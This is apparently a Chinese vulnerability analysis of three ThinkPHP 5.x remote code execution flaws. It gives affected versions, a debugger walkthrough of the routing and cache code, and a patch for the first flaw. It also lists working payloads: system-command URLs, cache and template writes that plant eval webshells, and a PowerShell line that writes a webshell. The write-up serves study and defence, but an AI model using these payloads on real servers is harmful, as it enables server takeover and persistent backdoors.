RCE1

影响版本

1 2	TP 5.0.7 - 5.0.24 TP 5.1.0 - 5.1.30

payload

5.0

?s=index/think\config/get&name=database.username // 获取配置信息
?s=index/\think\Lang/load&file=../../test.jpg    // 包含任意文件
?s=index/\think\Config/load&file=../../t.php     // 包含任意.php文件
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
?s=index|think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][0]=whoami

5.1

?s=index/\think\Request/input&filter[]=system&data=pwd
?s=index/\think\view\driver\Php/display&content=<?php phpinfo();?>
?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=<?php phpinfo();?>
?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

复现环境 tp 5.1.29+phpstorm+phpstudy+php7.3.9

下载对应版本的TP

composer create-project topthink/think=X.X.X TPX.X.X --prefer-dist
下载好后在文件夹内更改composer.json文件
将require更改为
"require": {
    "php": ">=5.6.0",
    "topthink/framework": "x.x.x"
}
然后composer update

漏洞分析

在App.php的4.2行下断点

访问http://127.0.0.1/thinkphp/tp5.1/public/?s=index/\think\Request/input&filter[]=system&data=whoami

屏幕截图 2021-03-06 183421

进入routeCheck()，进入path()方法

屏幕截图 2021-03-06 183439

进入pathinfo()方法，根据我们不同的请求方法会使用不同方法获取url的信息

屏幕截图 2021-03-06 183454

最终获取的信息就是index/\think\Request/input

接下来判断是否为强制路由，如是则后面报错退出

屏幕截图 2021-03-06 183525

然后进入check(), 返回一个UrlDispatch的对象，之后调用的init()方法就是Url.php中的init()方法，最终RouteCheck方法返回一个类

屏幕截图 2021-03-06 183548

屏幕截图 2021-03-06 183609

之后进入init()方法中

屏幕截图 2021-03-06 183636

进入parseUrl()方法

屏幕截图 2021-03-06 183833

进入parseUrl()方法，该方法将访问的url信息拆分为 module，controller，action

屏幕截图 2021-03-06 183859

然后传入module类，此时的result为，进入module类后对模块等参数进行验证

屏幕截图 2021-03-06 191202

然后一路执行到

屏幕截图 2021-03-06 195122

这里先创建一个闭包函数，传入add()方法，然后将闭包函数作为中间件存入$this->queue[$type][] = $middleware;

然后进入dispatch()方法，使用回调函数调用resolve()方法

屏幕截图 2021-03-06 183936

进入resolve()方法$middleware = array_shift($this->queue[$type]);将之前的闭包函数赋值给

$middleware，到下面的call_func_array调用之前的闭包函数

屏幕截图 2021-03-06 200115

执行Dispatch类的run()方法屏幕截图 2021-03-06 200436

进入到module类的exec()方法，直到利用反射机制实现rce

屏幕截图 2021-03-06 201210

1 2	写入shell ?s=index/\think\template\driver\file/write?cacheFile=shell.php&content=%3C?php%20phpinfo();?%3E

屏幕截图 2021-03-06 203026

修复方法

在module类中增加对控制器合法性的检测

// 是否自动转换控制器和操作名
$convert = is_bool($this->convert) ? $this->convert : $this->rule->getConfig('url_convert');
// 获取控制器名
$controller       = strip_tags($result[1] ?: $this->rule->getConfig('default_controller'));
$controller = strip_tags($result[1] ?: $this->rule->getConfig('default_controller'));

if (!preg_match('/^[A-Za-z](\w)*$/', $controller)) {
    throw new HttpException(404, 'controller not exists:' . $controller);
}

$this->controller = $convert ? strtolower($controller) : $controller;

// 获取操作名

RCE2

影响版本

1	5.0.0 - 5.0.10

复现环境 phpstorm+phpstudy+php7.3.9

payload

1	http://127.0.0.1/thinkphp/tp5.0.10/public/index.php/Index/Test/test?username=%0d%0a@eval($_GET[_]);//

创建demo，在application\index\controller下创建Test.php文件

<?php
namespace app\index\controller;
use think\Cache;

class Test
{
	public function test()
	{
		Cache::set("name",input("get.username"));
        return 'Cache success';
	}
}

生成了php文件

<?php
//000000000000s:24:"
@eval($_GET[_]);//";
?>

漏洞分析

在入口处下断点

屏幕截图 2021-03-07 220431

进入Cache类的set方法

屏幕截图 2021-03-07 220451

进入init()方法

屏幕截图 2021-03-07 220621

进入connect()方法，获取$options，最终返回的self::$instance[$name]是file类的实例化

屏幕截图 2021-03-08 194938

屏幕截图 2021-03-08 195844

退出后进入file类的set()方法，然后进入getCacheKey()方法，在这将变量$name的值进行md5加密，将前两位作为文件夹名，后面的几位作为文件名，而$name的值就是在开始创建文件中的name

屏幕截图 2021-03-08 193739

屏幕截图 2021-03-08 200249

返回set()方法，将url中的数据与\r\n@eval($_GET[_]);//拼接，存入文件中

屏幕截图 2021-03-08 193725

RCE3

影响版本

5.0-5.0.23  开起debug无论在完整版还是非完整版都会触发
5.0-5.0.12  不需要?s=captcha
5.0.0 5.0.5 5.0.10 5.0.12 这几个版本测试无论在什么情况下都会触发 非完整版 不开启debug，一部分原因是较低版本默认开启debug 但是关闭debug还是会触发
5.0.22 等等版本则需要使用完整版或者开启debug  并且加上?s=captcha

复现环境 phpstorm+phpstudy+php5.5.9+tp5.0.22完整版

payload

http://127.0.0.1/thinkphp/tp5.0.23w/public/index.php?s=captcha

_method=__construct&filter[]=system&method=GET&get[]=whoami （几乎所有版本都通用的payload）

windows下写入shell 
_method=__construct&filter[]=system&method=GET&get[]=powershell -c "echo '<?php eval($_GET[123]);?>' " >> 1.php